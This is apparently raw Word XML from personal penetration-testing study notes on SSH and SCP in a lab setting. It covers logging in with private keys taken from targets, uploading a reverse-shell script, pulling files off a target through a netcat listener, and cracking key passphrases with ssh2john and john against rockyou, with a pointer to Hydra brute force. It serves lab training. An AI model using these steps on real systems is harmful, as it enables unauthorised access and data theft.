        <w:t xml:space="preserve">With private key for SSH and port 2222:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -i id_rsa -P 2222 /home/kali/pass.txt anita@192.168.216.245:/home/anita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i id_rsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to specify private key for SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-P 2222</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for custom port to connect to SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With password for SSH and port 22 (default):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp /home/kali/Desktop/revshell.sh bob@192.168.1.50:/tmp/</w:t>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_blo8wd2tf9ht" w:id="102"/>
      <w:bookmarkEnd w:id="102"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH</w:t>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rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY IMPORTANT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You need a trailing line at the end of private SSH key in order for it to work. This is important for when you copy and paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In other words, you need a "0a" at the last line, which is equivalent to \n which is equivalent to just putting a new trailing line at the end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I had to fix this to get it to work in the MedTech Challenge Lab to get into the last .14 machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I kept on getting this error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Load key "id_rsa": error in libcrypto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used sublime text btw, in case that matters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, then try this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vim --clean /path/to/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:wq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And this changes the file and makes it cleaner format. This should just add the newline though. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId251">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://unix.stackexchange.com/questions/577402/ssh-error-while-logging-in-using-private-key-loaded-pubkey-invalid-format-and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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have a username, just try logging in via SSH. Sometimes you might not need a password. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if it doesn't work, try Hydra brute force for SSH. Look at the the Hydra section for that</w:t>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t xml:space="preserve">How to log into SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh [username]@[remote_ip]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="284"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to troubleshoot for problems, like if private key doesn't work</w:t>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t xml:space="preserve">How to SSH using Private Keys (ex. Private RSA keys):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="892"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i /path/to/their_private_key username@target_ip</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to move files from SSH to local:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using SCP (RUN THIS ON LOCAL MACHINE):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp user@10.10.10.123:/home/user/files/target.zip ~/Downloads/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to run this from your LOCAL MACHINE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -r username@&lt;remote_IP&gt;:/path/to/remote/directory /path/to/local/destination</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for directories (the -r is the difference)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using netcat (if SCP/SSH is Restricted)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a netcat listener ON LOCAL MACHINE to receive the file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvp 4444 &gt; name_of_file.zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Send the file using netcat ON TARGET MACHINE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /path/to/target.zip | nc &lt;local-ip&gt; 4444</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t xml:space="preserve">How to move private keys from target machine to local so that you can use it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">paste private key into it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600 id_rsa </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This makes it only readable/writable by owner and NO OTHER privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa daniel@10.129.226.199</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it says you need a passphrase, then crack it using ssh2john</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john id_rsa&gt; hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C12">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
